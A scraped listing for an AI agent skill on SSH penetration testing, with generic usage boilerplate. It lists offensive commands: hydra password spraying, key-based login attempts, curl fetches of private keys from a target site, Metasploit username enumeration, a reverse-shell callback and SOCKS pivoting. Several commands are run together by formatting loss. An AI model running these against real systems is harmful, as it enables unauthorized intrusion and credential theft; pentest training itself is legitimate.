Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.
Confirm successful installation by checking the skill directory location:
.cursor/skills/ssh-penetration-testing
Restart Cursor to activate ssh-penetration-testing. Access via /ssh-penetration-testing in your agent's command palette.
โ
Security Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.
Vulnerability Assessment - Known CVEs, misconfigurations
Tunnel Documentation - Port forwarding configurations
Core Workflow
Phase 1: SSH Service Discovery
Identify SSH services on target networks:
# Quick SSH port scannmap -p22192.168.1.0/24 --open# Common alternate SSH portsnmap -p22,2222,22222,2200 192.168.1.100
# Full port scan for SSHnmap -p- --open192.168.1.100 |grep-issh# Service version detectionnmap -sV-p22192.168.1.100
# Test common password across usershydra -L users.txt -p Summer2024! ssh://192.168.1.100
# Multiple common passwordsforpassin"Password123""Welcome1""Summer2024!";do hydra -L users.txt -p"$pass" ssh://192.168.1.100
done
Phase 5: Key-Based Authentication Testing
Test for weak or exposed keys:
# Attempt login with found private keyssh-i id_rsa [email protected]# Specify key explicitly (bypass agent)ssh-oIdentitiesOnly=yes -i id_rsa [email protected]# Force password authenticationssh-oPreferredAuthentications=password [email protected]# Try common key namesforkeyin id_rsa id_dsa id_ecdsa id_ed25519;dossh-i"$key"[email protected]done
Check for exposed keys:
# Common locations for private keys~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/
# Web-accessible keys (check with curl/wget)curl-s http://target.com/.ssh/id_rsa
curl-s http://target.com/id_rsa
curl-s http://target.com/backup/ssh_keys.tar.gz
Phase 6: Vulnerability Exploitation
Search for known vulnerabilities:
# Search for exploitssearchsploit openssh
searchsploit openssh 7.2# Common SSH vulnerabilities# CVE-2018-15473 - Username enumeration# CVE-2016-0777 - Roaming vulnerability# CVE-2016-0778 - Buffer overflow# Metasploit enumerationmsfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run
# Username enumeration (CVE-2018-15473)use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run
Phase 7: SSH Tunneling and Port Forwarding
Local Port Forwarding
Forward local port to remote service:
# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server# Access internal web server through SSHssh-L8080:192.168.1.50:80 [email protected]# Now access http://localhost:8080# Access internal databasessh-L3306:192.168.1.50:3306 [email protected]# Multiple forwardsssh-L8080:192.168.1.50:80 -L3306:192.168.1.51:3306 [email protected]
Remote Port Forwarding
Expose local service to remote network:
# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server# Expose local web server to remotessh-R8080:localhost:80 [email protected]# Remote can access via localhost:8080# Reverse shell callbackssh-R4444:localhost:4444 [email protected]
Dynamic Port Forwarding (SOCKS Proxy)
Create SOCKS proxy for network pivoting:
# Create SOCKS proxy on local port 1080ssh-D1080[email protected]# Use with proxychainsecho"socks5 127.0.0.1 1080">> /etc/proxychains.conf
proxychains nmap -sT-Pn192.168.1.0/24
# Browser configuration# Set SOCKS proxy to localhost:1080
ProxyJump (Jump Hosts)
Chain through multiple SSH servers:
# Jump through intermediate hostssh-J user1@jump_host user2@target_host
# Multiple jumpsssh-J user1@jump1,user2@jump2 user3@target
# With SSH config# ~/.ssh/configHost target
HostName 192.168.2.50
User admin
ProxyJump [email protected]
โบClaude Desktop or compatible AI client with skill support
โบClear understanding of task or problem to solve
โบWillingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Steps
1Install skill using provided installation command
2Test with simple use case relevant to your work
3Evaluate output quality and relevance
4Iterate on prompts to improve results
5Integrate into regular workflow if valuable
Common Pitfalls
โ Expecting perfect results without iteration
โ Not providing enough context in prompts
โ Using skill for tasks outside its intended scope
โ Accepting outputs without review and validation
Best Practices
โ Do
+Start with clear, specific prompts
+Provide relevant context and constraints
+Review and refine all outputs before using
+Iterate to improve output quality
+Document successful prompt patterns
โ Don't
โDon't use without understanding skill limitations
โDon't skip validation of outputs
โDon't share sensitive information in prompts
โDon't expect skill to replace human judgment
๐ก Pro Tips
โ Be specific about desired format and style
โ Ask for multiple options to choose from
โ Request explanations to understand reasoning
โ Combine AI efficiency with human expertise
When to Use This
โ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
โ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path
1Familiarize yourself with skill capabilities and limitations
2Start with low-risk, non-critical tasks
3Progress to more complex and valuable use cases
4Build expertise through regular use and experimentation
